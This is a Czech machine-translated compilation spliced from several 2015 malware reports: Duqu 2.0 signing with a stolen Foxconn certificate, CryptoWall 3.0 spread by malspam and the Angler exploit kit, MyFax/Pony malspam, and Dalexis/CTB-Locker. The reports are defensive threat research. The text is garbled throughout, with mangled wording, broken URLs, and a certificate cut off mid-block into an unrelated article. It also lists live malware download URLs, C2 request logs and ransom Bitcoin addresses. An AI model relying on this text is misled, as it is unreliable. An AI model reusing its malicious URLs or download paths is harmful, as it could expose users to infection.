Acer Inc. Amazon.com Apple Inc. BlackBerry Ltd. Cisco Dell Google Hewlett Packard Huawei Microsoft Mobility Motorola Nintendo Nokia Sony Toshiba Xiaomi Vizio Foxconn vyrábí několik populární https://en.wikipedia.org/wiki/Foxconn produktů, včetně BlackBerry, iPad, iPhone, Kindle, PlayStation 4, Xbox One a Wii U.
Stejný Certifikát byl použit výrobcem podepsat několik ovladačů WatchDog Timer Kernel (WDTKernel.sys) pro notebooky Dell v únoru 2013.
Závěry
Během našeho předchozího výzkumu do Stuxnet a Duqu Pozorovali jsme digitálně podepsané malware (pomocí škodlivého JMicron a Realtek CERT ). Krást digitální certifikáty a podepisování malware jménem legitimních podniků se zdá být pravidelný trik z útočníků Duqu. Nemáme žádné potvrzení, že některý z těchto dodavatelů být zneužit, ale naše ukazatele rozhodně ukazují, že útočníci Duqu mají velký zájem o výrobci hardwaru, jako je Foxconn, Realtek a JMicron. To se potvrdilo v 2014/2015 útocích, když jsme pozorovali infekce spojené s výrobci hardwaru z APAC, včetně ICS a SCADA výpočetní techniky výrobců.
Dalším zajímavým poznatkem je, že vedle těchto ovladačů Duqu jsme se odhalili jiný malware podepsané se stejnými certifikáty. To vylučuje možnost, že certifikáty byly unikly a jsou používány více skupin. To také naznačuje, že útočníci Duqu jsou jediní, kteří mají přístup k těmto certifikátů, které posiluje teorii, oni hacknutý výrobci hardwaru za účelem získání těchto certifikátů.
Nakonec, to je zajímavé, že útočníci Duqu jsou také dost na to, aby dvakrát používat stejný digitální certifikát opatrný. To je něco, co jsme viděli u Duqu z obou 2011 a 2015. Pokud je to pravda, pak to znamená, že útočníci mohou mít dost alternativní ukradené digitální certifikáty od jiných výrobců, které jsou připraveny k použití během dalšího cíleného útoku. To by bylo velmi alarmující, protože účinně podkopává důvěru v digitálních certifikátů.
Oba Verisign a Hon Hai byli informováni o použití certifikátu k podpisu malware Duqu 2.0.
Pořadové číslo Foxconn certifikátu používaného Duqu útočníky:
25 65 41 04 61 90 e2 33 f8 B0 9f 9e b7 c8 8e f8
Plná certifikát škodlivého řidiče:
--BEGIN CERTIFICATE--
Zvýšení CryptoWall 3.0 od škodlivého spamu a Rybář využívat kit
11.6.2015 Viry Úvod
Od pondělka 2015-05-25 (něco více než 2 týdny), jsme viděli velké množství CryptoWall 3,0 ransomware od škodlivého spamu ( malspam ) a rybář exploit kit (EK).
Malspam kampaň tlačí CryptoWall 3,0 začala již v pondělí 2015-05-25, ale to má od pondělka 06.08.2015 výrazně zvýšil. CryptoWall 3.0 tlak od rybář EK se zdá k začali kolem stejného času. Obě kampaně (malspam a rybář EK) byl aktivní jako v poslední době, jako středy 06.10.2015.
Načasování těchto kampaní naznačuje, že by mohly být v souvislosti a eventuálně zadá stejným herce.
Níže je uveden vývojový diagram ukazují cestu, na infekci z každého z těchto akcí: Nahoře: Cesta 1 ukazuje infekce řetěz z malspam - Path 2 ukazuje infekční řetězec od rybář EK.
CryptoWall 3.0 z malspam
Tato kampaň byla pomocí Yahoo e-mailové adresy poslat malspam. Dosud všechny přílohy byly pojmenované my_resume.zip . První týden této kampaně, materiálu extrahovaného z zip příloh byly všechny soubory HTML s názvem my_resume.svg. V té době, CryptoWall 3.0 ransomware byl stažen ze serveru ohrožena. Tento týden, extrahované názvy souborů HTML používat náhodná čísla, s názvy jako resume4210.html nebo resume9647.html . Kromě toho, CryptoWall nyní hostuje na různých docs.google.com URL. Nahoře: některé z e-mailů vidět počínaje 2015-05-25 prostřednictvím 6.8.2015.
Nahoře: příklady škodlivého spamu.
Otevření přílohu a extrahování souboru škodlivého vám dává dokument HTML. Příklad je uveden níže:
Nahoře: příklad souboru HTML uvnitř zip příloh z malspam.
Zde jsou některé z adres URL ze souborů unzip-ed HTML ve středu 06.10.2015:
arosit.dk - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=288 arosit.dk - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=296 arosit.dk - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=490 arosit.dk - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=609 boerie.co - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=161 boerie.co - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=191 boerie.co - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=579 interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=177 interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=317 interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=586 interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=623 interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=861 interestingengineering.net - GET /wp-content/plugins/revslider/temp/update_extract/resume/resume.php?id=873 Pokud otevřete jeden z těchto souborů HTML, bude Váš prohlížeč generovat provoz k ohrožení serveru: Nahoře: provoz z požadavku GET HTTP k jednomu z kompromitovaných serverech.
Návratnost provoz je gzip komprimovaný, takže nebude vidět ho v TCP proudu od Wireshark. Export text z Wireshark ukazuje, HTML, který odkazuje na sdílené dokumentu ze serveru Google: Nahoře: HTML vrátil po požadavku GET ukazuje na docs.google.com.
Zde jsou některé z docs.google.com URL jsme viděli z provozu ve středu 06.10.2015:
(Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztV2ZrMGZTWFRnLU0 (Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztUmFCOGlteHdncWs (Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztTnEzNnFfZktRZUk (Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztdVU2RXZSeUlla00 (Https) docs.google.com -? GET / uc export = ke stažení & id = 0BzNnVzs5RTztczFQSWo4TWFtVnc (Https) docs.google.com -? GET / uc export = ke stažení & id = 0BzNnVzs5RTztcklyU2dKdXRJdlE (Https) docs.google.com -? GET / uc export = Stáhnout & id = 0BzNnVzs5RTztcDEyZEg0QkZuYms (Https) docs.google.com -? GET / UC export = ke stažení & id = 0BzNnVzs5RTztaTNtOTJyd1hCejg (Https) docs.google.com -? GET / UC export = ke stažení & id = 0B-HWsX8wPhPFZDk2dms3c2plZk0 (Https) docs.google.com -? GET / UC export = ke stažení & id = 0B-HWsX8wPhPFVTNpNTJneHJKazQ (Https) docs.google.com -? GET / UC export = ke stažení & id = 0B-HWsX8wPhPFQzJsSmYtdERrZ1k Zkoumání provoz v Wireshark, najdete vidět řetěz událostí, vedoucích z ohrožení serveru na docs.google.com: Nahoře: Wireshark displeji jedno z požadavků dostanete na ohrožení serveru.
Spusťte stažený malware na hostitele se systémem Windows, a zjistíte, provoz, který je typický pro CryptoWall 3.0. Nahoře: Wireshark zobrazení na některé CrytpoWall 3.0 provozu.
Bitcoin adresa pro výplatu výkupného tímto malware vzorku 16REtGSobiQZoprFnXZBR2mSWvRyUSJ3ag . Je to stejné Bitcoin adresa z předchozího vzorku nalezen ve čtvrtek 06.4.2015, kdy jsme byli poprvé oznámeno tohoto konkrétního malspam [ 1 ]. Také jsme viděli stejnou Bitcoin adresu používanou v úterý 06.09.2015 [ 2 ] spojena s další vlnou malspam následující týden.
Nahoře: dešifrovat pokyny ze vzorku CryptoWall 3.0.
CryptoWall 3.0 z rybář EK
Poprvé jsme si všiml rybář EK tlačí CryptoWall 3,0 v úterý 2015-05-26 [ 3 ]. Posta jsem deník o tom ve čtvrtek 2015-05-28 [ 4 ]. To bylo poprvé, co jsem viděla verzi 3.0 CryptoWall zaslaný Rybář. Viděl jsem předchozí verze CryptoWall od rybář, ale ne 3,0 až do této kampaně.
Moje poslední zdokumentovaný případ Angler EK vysílajícího CryptoWall 3.0 se stalo v úterý 06.9.2015 [ 5 ]. Jsme stále svědky případů, kdy CryptoWall 3.0 přišli z Rybář jak nedávno jak středě 06.10.2015.
V každém případě jsem zdokumentován, Bitcoin adresa pro výplatu výkupného byl 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB .
Rybář EK je stále používán jinými skupinami posílat různé malware náklad. Nicméně, vzhled CryptoWall 3,0 v Rybář od 2015-06-26 pomocí stejné Bitcoin adresa označuje toto je samostatnou kampaň specifickým herec.
Tento týden, napadené webové stránky, které přesměrovány do Rybář se kód injekčně do svých webových stránek, podobně jako následující příklad:
Nahoře: Škodlivý kód vstřikuje do stránky z oslabenou webového serveru (bodů na rybář EK).
Bezpečnostní kolega Profesionální mi oznámen toto je běžná injekční technika používaná na WordPress stránek, které byly přesměrování provozu na rybář EK.
Obrázek níže ukazuje 06.9.2015 Angler EK provoz a CryptoWall 3.0 post-infekce aktivitu, jak je vidět v Wireshark: Nahoře: Wireshark zobrazení na rybář EK a po infekci provozu od CryptoWall 3.0.
Závěrečná slova
Načasování těchto dvou kampaních, spolu s jejich důsledné používání stejných Bitcoin adresy pro výplatu výkupného, naznačují, že jsou příbuzní. Ty mohou být spuštěny na stejném herce. To je významný trend v našem současném hrozeb. Budeme nadále sledovat tuto činnost, a nahlásit případné významné změny v situaci.
Aktualizovat - čtvrtek 06.11.2015 v 01:13 UTC
Generované jsem víc Angler EK provoz na 06.11.2015 v 00:09 UTC. Tentokrát jsem dostal vzorek pomocí jinou adresu, než Bitcoin jsem viděl z předchozích Angler bázi CryptoWall 3,0 náklad. To Bitcoin adresa, 12LE1yNak3ZuNTLa95KYR2CQSKb6rZnELb , začal transakce během stejném časovém rámci jako ostatní vzorky spojené s touto kampaní.
V tomto bodě, nejsem si 100 procent jistý, že je to stejný herec za tím vším stojí CryptoWall 3.0 jsme byli svědky v poslední době. Nicméně, můj vnitřní pocit mi říká, že tato činnost je všechno souvisí s stejným hercem nebo skupiny. Načasování je příliš velká náhoda.
Dopravní a spojené malware lze nalézt na adrese:
http://malware-traffic-analysis.net/2015/06/11/2015-06-10-CryptoWall-3.0-from-malspam-traffic.pcap http://malware-traffic-analysis.net/2015/06/11/2015-06-11-CryptoWall-3.0-from-Angler-EK-traffic.pcap http://malware-traffic-analysis.net/2015/06/11/2015-06-11-CryptoWall-3.0-malware.zip Zip soubor je chráněn se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.
--- Brad Duncan ISC Handler a bezpečnostní výzkumník u Rackspace Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic
MyFax malspam vlna s odkazy na malware a Neutrino využívat kit
3.6.2015 Viry Úvod
Již středu 2015-05-27, tam byli více vlny škodlivého spamu (malspam) spoofing myfax.com. V úterý 06.2.2015, zprávy obsahovaly odkazy na zip archivu jednoho Pony downloader. Úterní zprávy také měl odkazy tlačí Neutrino využívat kit (EK). Spoofed MyFax e-maily nejsou ničím novým. Už už léta. Jedná se o další vlna v nepřetržitém náporem malspam, že organizace čelí každý den.
Pozadí
Dříve na 06.2.2015, Techhelplistcom tweeted o MyFax malspam našel [ 1 ], a on posílal odkazy z těchto e-mailů do Pastebin [ 2 ].
Všiml jsem si, podobné zprávy minulý týden, ale oni byli všichni blokovány. V té době jsem nebyl schopen dále zkoumat jakékoliv. Na 6.2.2015, kontrola spamové filtry můj zaměstnavatel odhalil falešné MyFax zprávy byly po 3 dny přestávky přichází znovu.
Podrobnosti
Níže je příklad zpráv blokovaných spam filtry mé organizace na 06.2.2015:
Nahoře: MyFax tématikou malspam z úterku 06.2.2015
Výše uvedený příklad ukazuje 2 typy adres URL. První body do souboru zip. Druhé poukazuje na adresy URL, které končí v fax.php že tlačí Neutrino EK. Minulý týden malspam měla pouze odkazy na zip souborů.
Nahoře: MyFax-tématickém malspam od čtvrtka, 2015-05-28
V laboratorním prostředí, tyto vazby konče fax.php vrátil HTML s iframe vedoucí k Neutrino EK.
Bohužel, nebyl jsem schopen generovat žádnou Neutrino EK provoz. Názvy domén pro neutrina adres URL nevyřeší v DNS provozu.
Viděli jsme následující fax.php adresy URL z malspam:
chuotbu.com - GET /wp-content/plugins/feedweb_data/fax.php www.faura-casas.com - GET /wp-content/plugins/feedweb_data/fax.php Také jsme zjistili, že tyto adresy URL pro zip souborů z malspam:
sv.com.vn - GET /wp-content/plugins/feedweb_data/pdf_efax_message_3537462.zip edenika.net - GET /wp-content/plugins/cached_data/pdf_fax_message238413995.zip edujay.com - GET /wp-content/plugins/cached_data/pdf_fax_message238413995.zip eciusda.org - GET /wp-content/plugins/cached_data/pdf_fax_message238413995.zip nightskyhotel.com - GET /wp-content/plugins/feedweb_data/incoming_myfax_doc.zip sciclubtermeeuganee.it - GET /wp-content/plugins/feedweb_data/pdf_efax_message_3537462.zip serenityonthesquare.com - GET /wp-content/plugins/cached_data/pdf_efax_message_3537462.zip vanepcanhcuong.com - GET /modules/mod_vvisit_counter/images/digit_counter/embwhite/pdf_efax_message_3537462.zip www.ditta-argentiero.it - GET /wp-content/plugins/feedweb_data/pdf_efax_message_3537462.zip Tady je to, co jsme viděli v laboratorním prostředí při stahování souboru zip, extrahování malware, a infikování hostitele systému Windows:
Klikněte na obrázek pro zobrazení v plné velikosti
Indikátory kompromisu (IOC) z infekce dopravy:
112.78.2.223 - nightskyhotel.com - GET /wp-content/plugins/feedweb_data/incoming_myfax_doc.zip HTTP / 1.1 78.136.221.141 - moskalvtumane.com POST /gate.php HTTP / 1.0 94.73.151.210 - mechgag.com - GET /wp-content/plugins/feedweb_data/k1.exe HTTP / 1.0 87.250.250.8 - yandex.ru - GET / HTTP / 1.1 93.158.134.3 - www.yandex.ru - GET / HTTP / 1.1 213.152.181.66 - dortwindfayer.com - GET /confk.jpg HTTP / 1.1 213.152.181.66 - dortwindfayer.com - GET /ki.exe HTTP / 1.1 213.152.181.66 - dortwindfayer.com - GET /ki.exe HTTP / 1.1 213.152.181.66 - dortwindfayer.com- POST /gate.php HTTP / 1.1 213.152.181.66 - dortwindfayer.com - GET /confk.jpg HTTP / 1.1 213.152.181.66 - dortwindfayer.com - GET /ki.exe HTTP / 1.1 213.152.181.66 - dortwindfayer.com - GET /ki.exe HTTP / 1.1 213.152.181.66 - dortwindfayer.com - POST /gate.php HTTP / 1.1 213.152.181.66 - dortwindfayer.com - GET /confk.jpg HTTP / 1.1 Obrázek níže ukazuje vznikajících hrozeb založené na Snortu události na infekce dopravy s použitím zabezpečení Cibule . Tyto události označují Fareit / Pony downloader infikován laboratoři hostitele s Graftor nebo Zeus / Zbot varianty.
Vzorek pony downloader byl předložen k malwr.com na: https://malwr.com/analysis/ODExOWNlY2Y4N2QwNDhkNmE4YmFkODc2ODA3NzlkNDI/
Vzorek follow-up malwaru byl také předložen k malwr.com na: https://malwr.com/analysis/OTc4MWY3OTdmZDZkNGYxMGJhNGRkMDAzOThlNmQ1NmI/
Post-infekce provoz obsahuje HTTP GET požadavky na malé obrazový soubor s obrazem Marlon Brando od kmotra filmů. Matthew Mesa našel nějaké jiné adresy URL s (to, co předpokládám, že je), stejný obrázek [ 3 ].
Obraz obsahuje nějaký text ASCII pro poslední 1,4kilobajt nebo tak souboru, což znamená, steganografie je používán poslat nějaké informace do infikovaného počítače.
Závěrečná slova
Pcap z 06.02.2015 infekce provoz je k dispozici na adrese:
http://malware-traffic-analysis.net/2015/06/02/2015-06-02-myfax-malspam-infection-traffic.pcap Zip soubor přidružené malware je na adrese:
http://malware-traffic-analysis.net/2015/0 6 / 02 / 2015-06 -02 -myfax-malspam -artifacts.zip Zip soubor je chráněn heslem se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.
Zvláštní poděkování patří Techhelplist a Matthew Mesa pro své Twitter příspěvků o této činnosti. Techhelplist také aktualizoval svůj blog záznam o falešných MyFax e-mailů s tímto nejnovějších informací [ 4 ].
--- Brad Duncan ISC Handler a bezpečnostní výzkumník u Rackspace Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic
Škodlivý spam (malspam), je podle zaslané botnety každý den. Tyto malspam kampaně poslat malware navržen tak, aby infikovat počítače Windows. Uvidím Dridex nebo Upatre / Dyre kampaně denní bázi. Naštěstí, většina z těchto e-mailů jsou blokovány našimi spam filtry.
Co je Dalexis / CTB-Locker?
Dalexis je malware downloader. To kapky soubor CAB s vloženým dokumentem, který je otevřen v počítači uživatele [ 1 ], poté stáhne další malware. Dalexis se často používá k doručování CTB-Locker [ 2 ] [ 3 ]. CTB-Locker je ransomware který šifruje soubory na vašem počítači. Výměnou za platbu výkupného, bude malware autoři poskytují klíč k dešifrování souborů. Chování tohoto malware je dobře zdokumentováno, ale malé změny se často objevují jako nové vlny malspam jsou rozeslány.
Podobný vlna malspam od pondělí 2015-04-27 uvedlo techhelplist.com [ 4 ]. Další den viděl podobnou aktivitu. Tato kampaň bude pravděpodobně pokračovat. Níže je vývojový diagram z úterních vlny Dalexis / CTB-Locker malspam:
Zprávy mají mírně odlišné předmět linky, a každý přílohu e-mailu má jiný soubor hash. Nakažený jsem spoustu pomocí jedné z příloh. Níže jsou uvedeny odkazy na související soubory:
Vytěžené malware (Dalexis downloader): https://malwr.com/analysis/OTVjMzRjZDFjNWYwNDlmYzk4MTVmOWRlM2IzMmVkN2Y/ CTB-Locker stažen Dalexis: https://malwr.com/analysis/M2NlYmU3YmIwMzM0NGY1NTk4MTBjMzM0ZmZmZmZmZTE/ PCAP z infikovaného hostitele (10,8 MB): http://www.malware-traffic-analysis.net/2015/04/28/2015-04-28-Dalexis-and-CTB-Locker-traffic.pcap ZIP soubor 24 Dalexis vzorků z této malspam vlny: http://www.malware-traffic-analysis.net/2015/04/28/2015-04-28-Dalexis-samples.zip ZIP soubor je chráněn heslem se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.
Infekce jak je patrné z plochy
Vyňato malware z těchto e-mailových příloh je soubor SCR s ikonou aplikace Excel. Následující obrázek ukazuje, co se stalo hned po otevření této Dalexis malware na ploše:
O několik minut později, desktop vykazuje známky infekce CTB-Locker:
Pokyny pro dešifrování souborů jsou uvedeny níže:
Musel stáhnout prohlížeč Tor se dostat na informace dešifrování. Bitcoin adresa pro výplatu výkupného je: 18GuppWVuZGqutYvZz9uaHxHcostrU6Upc (zkontrolujte zde zjistit, zda byly všechny transakce byly provedeny v tomto Bitcoin účtu).
Provoz z infikovaného hostitele
Níže je obrázek z Sguil na bezpečnostní cibulkou pro některé z EmergingThreats a ETPRO Snort akcích viděl během této infekce:
Dalexis používá požadavek GET stáhnout CTB-Locker. Soubor je zašifrován v tranzitu, ale vyvolány jsem dešifrovat kopii z infikovaného počítače. Dalexis hlásí k velení a řízení (CNC) serveru po malware je úspěšně stažen.
V níže uvedeném obrázku, zjistíte, HTTP POST požadavky na různých serverech jako Dalexis se snaží najít CNC server, který bude reagovat. Tento vzorek Dalexis udělal 124 HTTP POST požadavky před serveru konečně odpověděl s 200 OK.
U ukazatelů kompromis (IOCs), seznam domén jedinečných k této infekce takto:
My odhalit neoprávněné pokusy o přihlášení k vašemu ID # 295030013990 z ostatních IP adresa. Prosíme znovu potvrďte svou identitu. Viz přiložené dokumenty pro úplné informace.
=== Eda Uhrhammer Millard Peter 111 Hunter Street East, Peterborough, ON K9H 1G7
CANADA 705-759-7751
Příloha : 295030013990.zip
POZNÁMKA: E-maily obsahují různé mezinárodní jména, adresy a telefonní čísla v bloku podpisu.
E-maily Collected
Čas začátku: 2015-04-28 10:00:13 UTC Konečný čas: 2015-04-28 16:16:28 UTC našel e-maily: 24
Krátce poté, co jsem ve složení tato položka deník, techhelplist.com posta článek o tomto konkrétním vlně malspam na 2015-04-28 na: https://techhelplist.com/index.php/spam-list/798-issue-account- dočasně-locked-různé-malware Malspam Kampaň Dalexis / CTB-Locker pokračovala ve středu 2015-04-29 s řádku předmětu: Váš účet [náhodné číslo] byl zakázán --- Brad Duncan, bezpečnostní výzkumník u Rackspace Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic
V posledních dvou dnech jsem infikován dva počítače z Rybář využít Kit (EK) domén na 216.245.213.0/24. Oba hostitelé byly infikovány CryptoWall 3.0 ransomware použitím stejného Bitcoin adresu pro výplatu výkupného: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB
V úterý, 2015-05-26 v 15:17 UTC, nakažený jsem počítač, kde rybář EK odesláno Bedep jako malware užitečného zatížení, než se dostane CryptoWall 3,0 [ 1 ]. Ve středu, 2015-05-27 v 17:30 UTC, nakažený jsem počítač, kde rybář EK odesláno CryptoWall 3.0 jako malware užitečného zatížení.
Já obvykle vidět rybář EK posílat různé typy ransomware [ 2 , 3 ], a viděl jsem spoustu CryptoWall 3,0 vzorků z velikosti EK; Nicméně, toto je poprvé, co jsem si všiml, CryptoWall od rybář EK.
Nahoře: CryptWall 3.0 dešifrovat pokyny od vzorku 2015-05-27
Provoz z infikovaného hostitele
CryptoWall 3.0 provoz změnila kousek od mého prvního deníku o tom v 2015-01-19 [ 4 ]. Níže Provoz byl viděn z infikovaného hostitele 2015-05-27 začínající v 17:30 UTC.
Nahoře: rybář EK a CryptWall 3.0 provozu, jak je vidět v Wireshark
Přidružené domény:
216.245.213.5 port 80 - vanskeligstesjeverozapadne1.xadultchat.com - Angler EK 91.184.19.41 port 80 - autorijschoolconsistent.nl - CryptoWall 3,0 check-in 213.186.33.50 port 80 - jeanrey.fr - CryptoWall 3,0 check-in 50.62.123.1 port 80 - 3bsgroup.com - CryptoWall 3,0 check-in 75.103.83.9 port 80 - braingame.biz - CryptoWall 3,0 check-in 62.221.204.114 port 80 - alsblueshelpt.nl - CryptoWall 3,0 check-in 184.168.47.225 port 80 - ammorgan.net - CryptoWall 3,0 check-in 79.96.220.223 port 80 - bezpiecznaswinka.pl - CryptoWall 3,0 check-in 148.251.140.60 port 80 - asadiag.com - CryptoWall 3,0 check-in 184.168.47.225 port 80 - alchemyofpresence.com - CryptoWall 3,0 check-in 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paygateawayoros.com - CryptoWall decrpyt instrukce 95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paymentgateposa.com - CryptoWall decrpyt instrukce 7oqnsnzwwnm6zb7y.optionpaymentprak.com (nevyřešil v DNS) - CryptoWall decrpyt instrukce 7oqnsnzwwnm6zb7y.watchdogpayment.com (nevyřešil v DNS) - CryptoWall decrpyt instrukce Rybář EK:
vanskeligstesjeverozapadne1.xadultchat.com - GET / molehill_inconsolably_erecting_prematureness / 174208500231771131 vanskeligstesjeverozapadne1.xadultchat.com - GET / OEmjzR2jUP6JG0o9h494My_bK-qvpSFR6NcLcwz5j32hxI3s vanskeligstesjeverozapadne1.xadultchat.com - GET / BjWMS7ksUcb9SztLJX7JlXe95voNnRcc7DfUJzRGbqTqKe8X CryptoWall 3,0 check-in provozu:
ip-addr.es - GET / autorijschoolconsistent.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?c=mr3jkiznke20nfh jeanrey.fr - POST /wp-content/uploads/wpallimport/uploads/3aa8810fe8a85c3aeaf70245feaf0a41/img3.php?w=mr3jkiznke20nfh 3bsgroup.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?t=mr3jkiznke20nfh braingame.biz - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?x=mr3jkiznke20nfh alsblueshelpt.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?n=mr3jkiznke20nfh asambleadedios.org - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?z=mr3jkiznke20nfh ammorgan.net - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?o=mr3jkiznke20nfh bezpiecznaswinka.pl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?k=mr3jkiznke20nfh asadiag.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?q=mr3jkiznke20nfh alchemyofpresence.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?z=mr3jkiznke20nfh Poznámka: Tyto adresy URL několikrát opakuje s různými náhodné řetězce na konci.
Dopravní způsobené prohlížení CryptoWall dešifrovat instrukce v prohlížeči:
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET / 1kwN8ko 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/style.css 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/us.png 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/it.png 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rt.png 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/fr.png 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /picture.php?k=1kwn8ko&4d2156f57fb503178f62c2f95690e599 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rb.png 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/es.png 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/de.png 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lb.png 7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lt.png
Nahoře: vznikajících hrozeb založené na Snortu události na infekce dopravy s použitím zabezpečení Onion
Předběžná analýza malware
Malware užitečné zatížení dodává rybář EK dne 2015-05-27:
Velikost souboru: 232,5 kilobajt (238080 bytes) MD5 hash: 30ca927d6e800177937788703fc87301 Poměr detekce: 2/57 První předložen: 2015-05-27 19:15:02 UTC https://www.virustotal.com/en/file/086a992a8525d3126a6ac7bb29360739d591c672a8099d4be8faa3fc95651792/analysis/ https://malwr.com/analysis/NGFmYjBiYmQ0N2M2NGExNDhlOTA0OWMzMDk1ZDg5MzM/ https://www.hybrid-analysis.com/sample/086a992a8525d3126a6ac7bb29360739d591c672a8099d4be8faa3fc95651792?environmentId=2 Závěrečná slova
Pcap z 2015-05-27 infekce provoz je k dispozici na adrese:
http://malware-traffic-analysis.net/2015/05/27/2015-05-27-Angler-EK-and-CryptoWall-3.0-infection.pcap Zip soubor přidružené malware je k dispozici na adrese:
http://malware-traffic-analysis.net/2015/05/27/2015-05-27-Angler-EK-and-CryptoWall-3.0-malware.zip Zip soubor je chráněn heslem se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.
--- Brad Duncan ISC Handler a bezpečnostní výzkumník u Rackspace Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic
Vyděračský malware se vrací na tuzemskou scénu, opět modifikovaný
22.5.2015 Viry V Česku proběhla další vlna nevyžádané e-mailové pošty s infikovanou přílohou. Cílem však prý není, jako obvykle, vykrást oběti bankovní účet, ale zašifrovat data a získat výkupné.
Elenoočka, která se v kampani využívá, je obávaný trojan typu downloader, který se poprvé objevil v květnu 2014. Nástup tohoto malwaru na scénu byl cílený na několik evropských zemí, mezi nimi i na Českou republiku. Následovala série kampaní, vždy s odstupem zhruba dvou měsíců, které všechny měly společný průběh i cíl.
Šlo o důvěryhodně vypadající e-maily, kde odesílatel upozorňoval na údajně neuhrazenou fakturu, nevyřízenou objednávku, informace o zásilce na cestě apod. – a to s cílem přimět adresáta, aby otevřel přiložený soubor. Ten vypadal jako wordovský nebo PDF dokument, ale ve skutečnosti šlo o spustitelný soubor, který do počítače oběti zavedl downloader Elenoočka.
Elenoočka byla ve všech kampaních v roce 2014 používána k tomu, aby do počítače oběti stáhla a nainstalovala specializovaný malware na vykrádání bankovních účtů.
Aktuální kampaň však šíří variantu tohoto downloaderu, která místo bankovního malware stahuje šifrovací malware FileCoder. Ten v napadeném počítači zašifruje soubory, zamkne obrazovku a zobrazí na ní výzvu k zaplacení výkupného.
Spamová kampaň Elenoočky, která v České republice proběhla ve dnech 15. a 16. dubna 2015, byla druhou kampaní v řadě, kdy byla Elenoočka použita k šifrovacímu vyděračskému útoku. Naplňuje se tak prognóza analytiků Eset, kteří po první kampani tohoto druhu v lednu 2015 předpovídali další pokračování.
„Elenoočka je obávaný downloader a maily, které jej šíří, vypadají čím dál důvěryhodněji. To, že tento malware byl již podruhé po sobě využit k šifrovacímu vyděračskému útoku namísto tradičních bankovních útoků, je pozoruhodné. Může to znamenat, že útoky na internetové bankovnictví nesplnily očekávání internetového podsvětí a že zločinci mění strategii,“ komentuje aktuální kampaň Robert Šuman, vedoucí pražského detekčního a analytického týmu společnosti Eset.
To by bylo v souladu se závěry panelu expertů na prestižní konferenci právnické fakulty americké Georgetown University “Cybercrime 2020: The Future of Online Crime and Investigations”. Podle tohoto panelu je představuje vyděračský malware budoucnost online kriminality.
Šifrovací malware FileCoder je podobný známějšímu a rozšířenějšímu CryptoLockeru, od něhož se liší především způsobem využití šifrovacího algoritmu.
„Ochranná opatření před šifrovacími útoky jsou pro všechny varianty šifrovacího malware stejná: zálohovat data, aktualizovat software a chránit počítače,“ doporučuje Pablo Ramos, ředitel výzkumu společnosti Eset v Latinské Americe.
Copy.com používá k distribuci Crypto ransomware 25.2.2015 Viry
Díky Marco za zaslání vzorku dalšího kusu krypto-výkupného malware. Soubor byl získán po návštěvě kompromisní webu (www.my- sda24.com). Zajímavé je, že malware sám byl uložen na copy.com.
Copy.com je cloud založený služba sdílení souborů, cílení na firemní uživatele. Je to běh Barracuda, společnost také známý pro jeho e-mail a web filtrování produktů, které chrání uživatele před právě takové malware. K jeho cti, Barracuda odstranit malware během několika minut Marco najít.
Alespoň teď, detekce pro tento vzorek není velký. Podle VirusTotal, 8 z 57 virus motorů identifikovat soubor jako škodlivý [1]. URL blacklist přístup může určit původní místo jako škodlivý, ale copy.com je nepravděpodobné, že budou blokovány. To se stalo velmi populární pro ničemové k ukládání škodlivých souborů na cloudové služby, zejména v případě, že nabízejí bezplatné zkušební účty. Ne všechny z nich jsou stejně rychle jako Barracuda odstranit tyto soubory.
